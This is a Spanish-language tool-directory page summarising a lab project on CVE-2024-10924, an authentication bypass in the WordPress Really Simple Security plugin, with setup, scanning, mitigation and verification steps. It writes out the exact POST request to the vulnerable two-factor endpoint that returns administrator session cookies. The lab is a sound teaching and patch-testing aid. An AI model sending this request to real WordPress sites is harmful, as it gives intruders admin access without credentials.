Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/bodoinon/cve-2024-10924
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónAprendizaje y Educación
GitHubbodoinon/cve-2024-10924

CVE-2024-10924

Demuestra la explotación y mitigación de CVE-2024-10924, una omisión de autenticación en WordPress Really Simple Security, con exploit automatizado en Python, pasos manuales con Burp Suite y verificación de parche.

Ver Repositorio
2hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-10924 - Bypass de Autenticación en Really Simple Security

DESCRIPCIÓN GENERAL Este proyecto demuestra la explotación y mitigación de CVE-2024-10924, una vulnerabilidad crítica de bypass de autenticación en el plugin de WordPress "Really Simple Security".

PASO 1: CONFIGURACIÓN DEL ENTORNO

Inicia el entorno vulnerable de WordPress: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d

Verifica que los contenedores estén en ejecución: docker ps

Accede a WordPress: http://localhost:1337

Herramientas necesarias:

  • Python 3.x (para el exploit automatizado)
  • Burp Suite (para explotación manual)
  • GVM (Greenbone Vulnerability Management) para escaneo

PASO 2: ESCANEO DE VULNERABILIDADES

Ejecuta el escaneo GVM contra el objetivo:

  • Objetivo: http://localhost:1337
  • Resultado esperado: CVE-2024-10924 detectado
  • Severidad: Crítica (CVSS 9.8)
  • Endpoint vulnerable: /reallysimplessl/v1/two_fa/skip_onboarding

PASO 3: EXPLOTACIÓN

Método A - Exploit Automatizado en Python: python exploit.py

Método B - Burp Suite Manual:

  1. Intercepta el tráfico hacia http://localhost:1337

  2. Envía una solicitud POST: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json

    {"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}

  3. Observa la respuesta con la cabecera Set-Cookie que contiene la sesión de admin

Resultado esperado:

  • Estado: 200 OK
  • Cookies de sesión de administrador devueltas
  • Bypass exitoso sin credenciales

PASO 4: MITIGACIÓN

Aplica el parche para bloquear el endpoint vulnerable: .\patch.ps1

Qué hace esto:

  • Copia mitigation.php al contenedor en /wp-content/mu-plugins/
  • Bloquea todas las solicitudes al endpoint REST API vulnerable
  • Devuelve 403 Prohibido para intentos de explotación
  • PASO 5: VERIFICACIÓN

    Vuelve a ejecutar el exploit (Método A o B): python exploit.py

    Resultado esperado después de la mitigación:

    • Estado: 403 Prohibido
    • No se devuelven cookies de admin
    • Ataque bloqueado exitosamente

    NOTAS ADICIONALES

    Para detener el entorno: docker-compose down

    Para ver los registros del contenedor: docker-compose logs -f

    Para acceder legítimamente al admin de WordPress: http://localhost:1337/wp-admin (Revisa docker-compose.yml para las credenciales)

    Descargar herramienta